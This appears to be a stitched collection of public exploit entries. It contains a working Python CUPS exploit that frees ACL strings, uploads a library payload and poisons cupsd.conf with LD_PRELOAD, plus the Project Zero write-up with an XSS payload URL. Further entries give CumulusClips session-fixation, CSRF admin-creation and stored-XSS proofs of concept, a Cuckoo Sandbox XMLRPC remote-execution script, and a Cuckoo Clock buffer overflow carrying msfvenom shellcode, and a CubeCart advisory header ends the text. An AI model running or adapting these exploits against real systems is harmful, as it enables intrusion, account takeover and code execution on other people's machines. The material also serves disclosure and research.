def locatePrinters(rhost, rport="631"):
request = ( "GET /printers HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
response = txrx(rhost, int(rport), "tcp", request)
if response is not None:
m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
if m is not None:
printer = m.group(1)
pretty("+","printer found: " + printer)
return printer
else:
pretty("-","no printers")
exit(1)
else:
pretty("-","no printers")
exit(1)
def preparePayload(libpath):
with open(libpath, 'rb') as f:
payload = f.read()
if payload is not None:
pretty("*","Payload:\n" + createDump(payload))
else:
pretty("-","something went wrong")
usage()
return payload
def seedTarget(rhost, rport, printer, payload):
i = random.randint(1,3)
reqid = str(pack(">i",(i+2)))
reqid2 = str(pack(">i",(i+3)))
printer_uri = "ipp://" + rhost + ":" + str(rport) + printer
create_job_packet = ("\x02\x00"
"\x00\x05"+
reqid+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
"\x02"
"\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
"\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
"\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
"\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
"\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
"\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
"\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
"\x03")
pretty("*","Sending createJob")
http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
createJobRequest = http_header1 + create_job_packet
blah = txrx(rhost,int(rport),"tcp",createJobRequest)
if blah is not None:
m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
if m is not None:
jobid = m.group(1)
else:
pretty("-","something went wrong");
exit()
pretty("*","\n" + createDump(blah) + "\n")
pretty("*", "Sending sendJob")
send_document_packet = ("\x02\x00"
"\x00\x06"+
reqid2+
"\x01"
"\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
"\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
"\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
"\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
"\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
"\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
"\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
"\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
"\x03"+
payload)
http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
"\x0d\x0a")
sendJobRequest = http_header2 + send_document_packet
blah2 = txrx(rhost,int(rport),"tcp",sendJobRequest)
pretty("*","\n" + createDump(blah) + "\n")
pretty("*","job id: " + jobid)
return jobid
def stompACL(rhost, rport, printer):
i = random.randint(1,1024)
printer_url = "ipp://" + rhost + ":" + rport + printer
admin_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+1)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x06" # val len: 6
"/admin"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x06" # val len: 6
"/admin"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x16" # val len: 22
"\x00\x06" # length
"/admin"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
conf_stomp = ("\x02\x00" # vers 2.0
"\x00\x05"+ # op id: Create Job (0x0005)
str(pack(">i",(i+2)))+
"\x01" # op attributes marker
"\x47" # charset
"\x00\x12" # name len: 18
"attributes-charset"
"\x00\x08" # val len: 8
"us-ascii"
"\x48" # natural language
"\x00\x1b" # name len: 27
"attributes-natural-language"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x45" # printer-uri
"\x00\x0b" # name len 11
"printer-uri" +
str(pack(">h", len(printer_url))) + printer_url +
"\x42" # name without lang
"\x00\x14" # name len: 20
"requesting-user-name"
"\x00\x0b" # val len: 11
"/admin/conf"
"\x02" # job attrs marker
"\x21" # integer
"\x00\x06" # name len: 6
"copies"
"\x00\x04" # val len: 4
"\x00\x00\x00\x01" # 1
"\x42" # name w/o lang
"\x00\x19" # name len: 25
"job-originating-host-name"
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x42" # nwol
"\x00\x00" # name len: 0
"\x00\x0c" # val len: 12
"AAAAAAAAAAAA"
"\x36" # nwl
"\x00\x00" # name len: 0
"\x00\x1b" # val len: 27
"\x00\x0b" # length
"/admin/conf"
"\x00\x0c"
"BBBBBBBBBBBB"
"\x03") # end of attributes
http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
"\x0d\x0a")
http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","stomping ACL")
pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
time.sleep(1)
pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))
http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","checking /admin")
pretty("*",">:\n" + createDump(http_header_check))
res = txrx(rhost,rport,"tcp",http_header_check)
pretty("*","<:\n" + createDump(res))
m = re.search('200 OK', res)
if m is not None:
pretty("+","ACL stomp successful")
else:
pretty("-","exploit failed")
exit(1)
def getConfig(rhost, rport):
i = random.randint(1,1024)
original_config = ""
http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Close\x0d\x0a"
"\x0d\x0a")
pretty("*","grabbing configuration file....")
res = txrx(rhost,rport,"tcp",http_request)
res_array = res.split("\x0d\x0a\x0d\x0a")
original_config = res_array[1]
pretty("*","config:\n" + original_config + "\n")
return original_config
def putConfig(rhost, rport, config):
http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
"Content-Type: application/ipp\x0d\x0a"
"Host: " + rhost + ":" + rport + "\x0d\x0a"
"User-Agent: CUPS/2.0.2\x0d\x0a"
"Connection: Keep-Alive\x0d\x0a"
"Content-Length: " + str(len(config)) + "\x0d\x0a"
"\x0d\x0a")
pretty("*","overwriting config...")
pretty("*",">:\n" + createDump(http_request + config))
pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))
def poisonConfig(config, name):
config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d000" + name + "-001\x0a"
return config
def main():
rhost = None;
rport = None;
noshell = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh', ['rhost=','rport=','lib=','stomp-only','help'])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
elif opt in ('-c','--lib'):
libpath = arg;
elif opt in ('-f','--stomp-only'):
noshell = 1;
banner()
if rhost is None or rport is None:
usage()
pretty("*","locate available printer")
printer = locatePrinters(rhost, rport)
pretty("*","stomp ACL")
stompACL(rhost, rport, printer)
if (noshell is not None):
pretty("*","fin")
exit(0)
pretty("*","prepare payload")
payload = preparePayload(libpath)
pretty("*","spray payload")
jobid = seedTarget(rhost, rport, printer, payload)
pretty("*","grab original config")
OG_config = getConfig(rhost, rport)
pretty("*","generate poison config")
evil_config = poisonConfig(OG_config, jobid)
pretty("*","upload poison config")
putConfig(rhost, rport, evil_config)
pretty("*","fin")
exit(0);
if __name__ == "__main__":
main()
Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html
Abstract
Modern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.
Despite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.
In this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.
By publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.
Summary
Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.
The reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.
Exploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.
Background
Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158)
When freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.
scheduler/ipp.c:1626:
/*
* Free old strings… ← Even 'old' strings need to be freed.
*/
for (i = 0; i < attr->num_values; i ++)
{
_cupsStrFree(attr->values[i].string.text);
attr->values[i].string.text = NULL;
if (attr->values[i].string.language) ← for all values in an attribute
{
_cupsStrFree(attr->values[i].string.language); ← free the 'language' string
attr->values[i].string.language = NULL;
}
}
In this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.
To specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.
The over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.
Dangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.
A Reflected XSS in the Web Interface (CVE-2015-1159)
The template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.
The template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.
The code is found in 'cgi_puts()', and escapes the following reserved HTML characters:
<>"'&
These are replaced with their HTML entity equivalents ('<' etc...).
The function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:
if (*s == '<')
{
/*
* Pass <A HREF="url"> and </A>, otherwise quote it...
*/
if (!_cups_strncasecmp(s, "<A HREF=\"", 9))
{
fputs("<A HREF=\"", out);
s += 9;
while (*s && *s != '\"')
{
if (*s == '&')
fputs("&", out);
else
putc(*s, out);
s ++;
}
if (*s)
s ++;
fputs("\">", out);
}
For variable values containing '<a href="', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing " would normally be escaped, but are echoed unaltered in this context.
Note that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.
Take this example from templates/help-header.tmp:19:
<P CLASS="l0"><A HREF="/help/{QUERY??QUERY={QUERY}:}">All Documents</A></P>
In this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href="', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.
Requesting the following URI will demonstrate this reflected XSS:
http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search
The 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.
Upstream Fixes
Apple Fix (April 16, 2015):
https://support.apple.com/kb/DL1807
Official CUPS fix for downstream vendors (June 8, 2015):
https://www.cups.org/str.php?L4609
http://www.cups.org/blog.php?L1082+I0+Q
Project Zero Bug
For those interested, the sample exploit can be found here:
https://code.google.com/p/google-security-research/issues/detail?id=455
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37336.tar.gz
Disclosure Timeline
March 20th, 2015 - Initial notification to Apple
April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3
June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3
June 18th, 2015 - Disclosure + 90 days
June 19th, 2015 - P0 publication
Attack Surface Reduction in CUPS 2.0.3+
CUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:
Configuration value strings are now logically separated from the string pool, allocated by strdup() instead.
LD_* and DYLD_* environment variables are blocked when CUPS is running as root.
The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).
Acknowledgements
Thanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.
Conclusion
No one prints anything anymore anyways.
# Exploit Title: CumulusClips Session fixation
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
Description:
CumulusClips is a video sharing script that allows you to start your own
video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS &
Android mobile devices, as well as all the major browsers.
PoC:
POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/
Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID%
3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C%
2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url=
BOZtzZX&submitted=TRUE&button=Update+Video
Remediation:
Change session id after sucessful login
Post exploitation:
Since it is posible to impersonate admin there is possibility for a code
execution and unrestricted file upload in admin panel.
#######################################################
# Exploit Title: CumulusClips XSRF and code execution
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
PoC:
<html>
<body>
<form action="http://192.168.122.203/cumulusclips/cc-admin/members_add.php" method="POST">
<input type="hidden" name="role" value="admin" />
<input type="hidden" name="email" value="admin@mailinator.com" />
<input type="hidden" name="username" value="newadmin" />
<input type="hidden" name="password" value="newadminpass" />
<input type="hidden" name="password-show" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="last_name" value="" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="about_me" value="" />
<input type="hidden" name="submitted" value="TRUE" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Remediation:
Use anti-csrf token, fix all XSS'es
#######################################################
# Exploit Title: CumulusClips Persistent XSS
# Google Dork: inurl:/cumulusclips/videos/
# Date: 2.09.2016
# Exploit Author: kor3k / Łukasz Korczyk
# Vendor Homepage: http://cumulusclips.org/
# Software Link: http://cumulusclips.org/cumulusclips.zip
# Version: 2.4.1
# Tested on: Debian Jessie
# CVE : [if applicable]
Description:
CumulusClips is a video sharing script that allows you to start your own video website.
CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers.
Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information.
PoC:
locations:
/cumulusclips/account/videos/edit/
/cumulusclips/account/upload/video/
POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/
Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video
reflected on main site:
GET /cumulusclips/ HTTP/1.1
Host: 192.168.122.203
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.122.203/
Connection: close
RESPONSE:
...
div class="video">
<div class="thumbnail">
<a href="http://192.168.122.203/cumulusclips/videos/1358/www-script-alert-1-script/" title="www<script>alert(1)</script>">
<img width="165" height="92" src="http://192.168.122.203/cumulusclips/cc-content/uploads/thumbs/Ufi5q2RKsQtXwludfZnR.jpg" />
...
Post exploitation:
Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel.
Remediation:
Validate user input for special characters (preferable white list), use HTTPonly header
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode
# Exploit Title: Cuckoo Clock 5.0 - Buffer Overflow
# Exploit Author: boku
# Date: 2020-02-14
# Vendor Homepage: https://en.softonic.com/author/pxcompany
# Software Link: https://en.softonic.com/download/parallaxis-cuckoo-clock/windows/post-download
# Version: 5.0
# Tested On: Windows 10 (32-bit)
#
# Recreate:
# 1) Install & Open Cuckoo Clock v5.0
# 2) Right Click app icon (bottom right), click Alarms
# 3) Click the Add Button
# 4) Run Python script
# 5) Open generated poc.txt, then select-all & copy-all
# 6) Under Schedule, select-all in 'New Alarm' textbox, then paste buffer
# 7) Press Back Button and shellcode will execute
# EIP Overwrite at 260 Bytes
# Max Buffer space is 1287 bytes
# ESP points to payload at offset 264 bytes
# EBP overwrite at 256 bytes
# badChars = '\x00\x0d'
try:
ebpOffset = '\x41'*256
ebp = '\x42\x42\x42\x42'
eip = '\x16\x05\x03\x10' # 0x10030516 : jmp esp | ascii {PAGE_EXECUTE_READWRITE} [CERBERUS.dll]
# ASLR: False, Rebase: False, SafeSEH: False (C:\Program Files\Parallaxis Cuckoo Clock\CERBERUS.dll)
# ESP points to payload at offset 264 bytes
# 1019 bytes = Remaining Buffer Length
fixStack = '\x89\xE5' # mov ebp,esp
fixStack += '\x83\xEC\x30' # sub esp,byte +0x30
# root@kali# msfvenom -p windows/exec CMD=calc -b '\x00\x0d' -f python -v shellcode
# x86/shikata_ga_nai chosen with final size 216
shellcode = b""
shellcode += b"\xdd\xc3\xbb\x9a\x4d\x57\xfa\xd9\x74\x24\xf4"
shellcode += b"\x58\x33\xc9\xb1\x30\x83\xe8\xfc\x31\x58\x14"
shellcode += b"\x03\x58\x8e\xaf\xa2\x06\x46\xad\x4d\xf7\x96"
shellcode += b"\xd2\xc4\x12\xa7\xd2\xb3\x57\x97\xe2\xb0\x3a"
shellcode += b"\x1b\x88\x95\xae\xa8\xfc\x31\xc0\x19\x4a\x64"
shellcode += b"\xef\x9a\xe7\x54\x6e\x18\xfa\x88\x50\x21\x35"
shellcode += b"\xdd\x91\x66\x28\x2c\xc3\x3f\x26\x83\xf4\x34"
shellcode += b"\x72\x18\x7e\x06\x92\x18\x63\xde\x95\x09\x32"
shellcode += b"\x55\xcc\x89\xb4\xba\x64\x80\xae\xdf\x41\x5a"
shellcode += b"\x44\x2b\x3d\x5d\x8c\x62\xbe\xf2\xf1\x4b\x4d"
shellcode += b"\x0a\x35\x6b\xae\x79\x4f\x88\x53\x7a\x94\xf3"
shellcode += b"\x8f\x0f\x0f\x53\x5b\xb7\xeb\x62\x88\x2e\x7f"
shellcode += b"\x68\x65\x24\x27\x6c\x78\xe9\x53\x88\xf1\x0c"
shellcode += b"\xb4\x19\x41\x2b\x10\x42\x11\x52\x01\x2e\xf4"
shellcode += b"\x6b\x51\x91\xa9\xc9\x19\x3f\xbd\x63\x40\x55"
shellcode += b"\x40\xf1\xfe\x1b\x42\x09\x01\x0b\x2b\x38\x8a"
shellcode += b"\xc4\x2c\xc5\x59\xa1\xc3\x8f\xc0\x83\x4b\x56"
shellcode += b"\x91\x96\x11\x69\x4f\xd4\x2f\xea\x7a\xa4\xcb"
shellcode += b"\xf2\x0e\xa1\x90\xb4\xe3\xdb\x89\x50\x04\x48"
shellcode += b"\xa9\x70\x67\x0f\x39\x18\x68"
Remainder = '\x46'*(1287-len(ebpOffset+ebp+eip+fixStack+shellcode))
payload = ebpOffset+ebp+eip+fixStack+shellcode+Remainder
File = 'poc.txt'
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'
Advisory ID: HTB23298
Product: CubeCart
Vendor: CubeCart Limited
Vulnerable Version(s): 6.0.10 and probably prior
Tested Version: 6.0.10
Advisory Publication: March 2, 2016 [without technical details]
Vendor Notification: March 2, 2016
Vendor Patch: March 16, 2016
Public Disclosure: March 30, 2016
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352]
Risk Level: Medium
